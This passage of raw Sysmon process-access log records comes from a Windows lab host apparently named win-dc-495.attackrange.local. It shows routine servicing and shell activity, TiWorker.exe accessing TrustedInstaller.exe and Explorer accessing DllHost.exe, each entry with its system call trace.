13:58:31.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.367{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.367{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.367{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.351{59A5CD1D-93FA-6005-FC04-00000000A301}37843848C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.351{59A5CD1D-93FA-6005-FC04-00000000A301}37843904C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.351{59A5CD1D-93FA-6005-FC04-00000000A301}37843904C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.351{59A5CD1D-93FA-6005-FC04-00000000A301}37843848C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.351{59A5CD1D-93FA-6005-FC04-00000000A301}37843848C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.351{59A5CD1D-93FA-6005-FC04-00000000A301}37843848C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b